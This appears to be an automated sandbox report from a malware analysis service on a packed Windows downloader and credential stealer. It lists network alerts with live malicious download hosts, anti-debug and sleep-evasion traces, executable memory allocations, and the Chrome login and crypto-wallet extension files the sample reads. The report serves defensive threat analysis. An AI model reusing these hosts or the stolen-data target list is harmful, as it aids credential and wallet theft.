Summary | ZeroBOX

AppGate2103v01.exe

Emotet, North Korea, Generic Malware, .NET framework(MSIL), Malicious Library, Downloader, UPX, Malicious Packer, Admin Tool (Sysinternals etc ...), Code injection, ScreenShot, DNS, Anti_VM, Steal credential, Socket, AntiDebug, PE64, PE File, PE32, AntiVM

Category FILE
Machine s1_win7_x6403_us
Started June 3, 2024, 9:34 a.m.
Completed June 3, 2024, 9:36 a.m.
Size 3.3MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 9905d4c0f3aaf44c8f7a0f6c4b4d3543
SHA256 2d8524c8b31583d8237455c7211f486667d4cd9ae7db7ac4bab3cbde6b9a5e7b
CRC32 BB575206
ssdeep 98304:HETDbLgHBfCrX0TvTtJOPsRsT90DV8OrLz:CjgHNCgLT7OEsTaDV7r
Yara
  • IsPE64 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

IP Address Status Action

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49164 -> 104.26.9.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49164 -> 104.26.9.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 172.67.159.232:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49168 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49166 -> 104.237.62.213:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.237.62.213:443 -> 192.168.56.103:49167 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2400000 ET DROP Spamhaus DROP Listed Traffic Inbound group 1 Misc Attack
TCP 172.67.159.232:80 -> 192.168.56.103:49180 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2400013 ET DROP Spamhaus DROP Listed Traffic Inbound group 14 Misc Attack
TCP 147.45.47.149:80 -> 192.168.56.103:49178 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.103:49170 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2400029 ET DROP Spamhaus DROP Listed Traffic Inbound group 30 Misc Attack
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49175 -> 91.202.233.232:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 172.67.159.232:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 94.232.45.38:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 172.67.159.232:80 -> 192.168.56.103:49184 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 172.67.159.232:80 -> 192.168.56.103:49185 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49190 -> 172.67.159.232:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49174 -> 5.42.66.10:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49181 -> 45.130.41.108:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.130.41.108:80 -> 192.168.56.103:49181 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 45.130.41.108:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49188 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49188 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49183 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49189 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49189 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49200 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49197 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49197 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 45.130.41.108:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.130.41.108:80 -> 192.168.56.103:49186 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 45.130.41.108:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 147.45.47.149:54674 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2014819 ET INFO Packed Executable Download Misc activity
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49199 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49201 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49201 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49203 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49202 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49205 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49209 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49209 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49210 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49213 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49214 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49214 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49218 -> 5.42.66.10:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49218 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49218 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49219 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 87.240.132.67:80 -> 192.168.56.103:49206 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49212 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.103:49164 -> 104.26.9.59:443 | C=US, O=Let's Encrypt, CN=R3 | CN=myip.com | 87:d2:90:92:b6:6a:56:3c:25:f1:ae:56:52:d9:2b:ac:16:44:bb:bc
TLSv1 192.168.56.103:49170 -> 104.26.4.15:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=db-ip.com | 1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25
TLSv1 192.168.56.103:49190 -> 172.67.159.232:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=foxesjoy.com | 98:61:17:75:9f:9b:34:ec:5e:dd:5b:36:49:5e:1b:7d:2d:22:18:22
TLSv1 192.168.56.103:49198 -> 45.130.41.108:443 | C=US, O=Let's Encrypt, CN=R3 | CN=monoblocked.com | 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac
TLSv1 192.168.56.103:49199 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49205 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49210 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49213 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49217 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1 192.168.56.103:49222 -> 87.240.132.67:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section _RDATA
section .vmpx\xc2\xbd\xc2
resource name UIFILE
resource name None
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 3655312
registers.edi: 0
registers.eax: 3655312
registers.ebp: 3655392
registers.edx: 0
registers.ebx: 5160288
registers.esi: 4809512
registers.ecx: 2212295062
1 0 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00720000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00570000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b34000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b3a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00de9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0

Remaining calls in this block, one per line. All are made by process 2816 with process_handle 0xffffffff (the calling process itself); stack_dep_bypass and stack_pivoted are 0 on every call. NtProtectVirtualMemory re-protects an existing page rather than allocating one, so its size is the length argument and it has no allocation_type.

API                      base_address  size   allocation_type    protection                   heap_dep_bypass  status  return  repeated
NtAllocateVirtualMemory  0x0042d000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00dea000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00deb000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00dec000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00ded000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00dee000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x04de0000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x04de1000    49152  4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x04ded000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x0042a000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00610000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  0                1       0       0
NtProtectVirtualMemory   0x73cc4000    4096   (length)           64 (PAGE_EXECUTE_READWRITE)  0                1       0       0
NtAllocateVirtualMemory  0x04dee000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x0042e000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x04def000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
NtAllocateVirtualMemory  0x00630000    4096   4096 (MEM_COMMIT)  64 (PAGE_EXECUTE_READWRITE)  1                1       0       0
description AppGate2103v01.exe tried to sleep 265 seconds, actually delayed analysis time by 265 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
